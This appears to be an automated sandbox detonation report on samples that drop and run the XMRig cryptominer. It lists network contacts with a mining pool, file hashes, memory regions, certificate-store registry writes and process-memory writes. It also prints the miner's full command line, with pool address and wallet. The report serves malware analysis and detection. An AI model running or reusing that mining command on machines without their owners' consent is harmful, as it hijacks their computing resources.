| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2108-16-0x000001D3F8710000-0x000001D3F8730000-memory.dmp
memory/2108-17-0x000001D3F9F00000-0x000001D3F9F20000-memory.dmp
memory/2108-18-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-19-0x000001D3F9F20000-0x000001D3F9F40000-memory.dmp
memory/2108-20-0x000001D3F9F40000-0x000001D3F9F60000-memory.dmp
memory/2108-21-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-22-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-23-0x000001D3F9F20000-0x000001D3F9F40000-memory.dmp
memory/2108-25-0x000001D3F9F40000-0x000001D3F9F60000-memory.dmp
memory/2108-24-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-26-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-27-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-28-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-29-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-30-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-31-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-32-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-33-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-34-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-35-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-36-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-37-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-38-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-39-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-40-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-41-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-42-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-43-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-44-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-45-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-46-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-47-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-48-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-49-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-50-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-51-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-52-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-53-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-54-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-55-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-56-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-57-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-58-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-59-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-60-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-61-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-62-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-63-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-64-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-65-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-66-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-67-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-68-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-69-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-70-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-71-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-72-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-73-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-74-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-75-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-76-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-77-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-78-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-79-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-80-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-81-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-82-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-83-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-84-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2908 wrote to memory of 4508 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2908 wrote to memory of 4508 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4508-16-0x0000026BBDD30000-0x0000026BBDD50000-memory.dmp
memory/4508-17-0x0000026BBF530000-0x0000026BBF550000-memory.dmp
memory/4508-18-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-19-0x0000026BBF550000-0x0000026BBF570000-memory.dmp
memory/4508-20-0x0000026C51F30000-0x0000026C51F50000-memory.dmp
memory/4508-21-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-22-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-24-0x0000026BBF550000-0x0000026BBF570000-memory.dmp
memory/4508-23-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-25-0x0000026C51F30000-0x0000026C51F50000-memory.dmp
memory/4508-26-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-27-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-28-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-29-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-30-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-31-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-32-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-33-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-34-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-35-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-36-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-37-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-38-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-39-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-40-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-41-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-42-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-43-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-44-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-45-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-46-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-47-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-48-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-49-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-50-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-51-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-52-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-53-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-54-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-55-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-56-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-57-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-58-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-59-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-60-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-61-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-62-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-63-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-64-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-65-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-66-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-67-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-68-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-69-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-70-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-71-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-72-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-73-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-74-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-75-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-76-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-77-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-78-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-79-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-80-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-81-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-82-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-83-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-84-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:16
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1791s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572